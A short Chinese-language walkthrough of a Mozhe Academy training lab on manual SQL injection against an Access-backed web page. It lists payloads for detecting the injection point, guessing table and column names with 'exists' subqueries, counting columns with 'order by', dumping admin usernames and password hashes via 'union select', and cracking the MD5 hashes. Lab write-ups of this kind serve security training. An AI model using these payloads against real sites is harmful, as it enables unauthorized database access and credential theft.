墨者學院-SQL手工注入漏洞測試(Access資料庫)
我是直接sqlmap搞的,如下:
可以看到,這種access資料庫就暴力破解表名和列名!!!
IP位址 : 219.153.49.228 端口 : 44402 協定 : http
1.
![](https://img.laitimes.com/img/9ZDMuAjOiMmIsIjOiQnIsISPrdEZwZ1Rh5WNXp1bwNjW1ZUba9VZwlHdsATOfd3bkFGazxCMx8VesATMfhHLlN3XnxCMwEzX0xiRGZkRGZ0Xy9GbvNGLpZTY1EmMZVDUSFTU4VFRR9Fd4VGdsYTMfVmepNHLrJXYtJXZ0F2dvwVZnFWbp1zczV2YvJHctM3cv1Ce-cmbw5yNzMjNjJWNzATZmJWY0ATN4MzMkhTMjRTNhNmZzQmNz8CXxMzLcdDMxIDMy8CXn9Gbi9CXzV2Zh1WavwVbvNmLvR3YxUjL3M3Lc9CX6MHc0RHaiojIsJye.png)
2.利用and 1=1 =1正常,and 1=2 出現報錯說明有注入點。
3.猜測存在的表,and exists (select * from
admin),我這裡憑借着經驗猜出來是admin表,如果不是的話可以繼續猜,格式為:and exists (select * from
表名),運作不報錯,說明就是存在這個admin表了。
4.猜測這個表裡面有哪些字段:order by 4,不報錯剛好,如果報錯就說明大了,減小一下繼續,直到不報錯的那一個為止,就是字段數量了。
5.這個裡面存在4個字段,繼續猜解字段名:and exists (select username from admin),不報錯,說明存在username這個字段,不斷嘗試,繼續發現還有id passwd字段。這些字段都是全部靠猜測的,猜!格式:and
exists(select 字段名 from admin)
6.然後利用語句:union select 1,username,passwd,id from admin,格式:union select 字段,字段,字段,字段 from 表名
7.md5解密即可。
![](https://img.laitimes.com/img/9ZDMuAjOiMmIsIjOiQnIsISPrdEZwZ1Rh5WNXp1bwNjW1ZUba9VZwlHdsATOfd3bkFGazxCMx8VesATMfhHLlN3XnxCMwEzX0xiRGZkRGZ0Xy9GbvNGLpZTY1EmMZVDUSFTU4VFRR9Fd4VGdsYTMfVmepNHLrJXYtJXZ0F2dvwVZnFWbp1zczV2YvJHctM3cv1Ce-cmbw5yNzMjNjJWNzATZmJWY0ATN4MzMkhTMjRTNhNmZzQmNz8CXxMzLcdDMxIDMy8CXn9Gbi9CXzV2Zh1WavwVbvNmLvR3YxUjL3M3Lc9CX6MHc0RHaiojIsJye.png)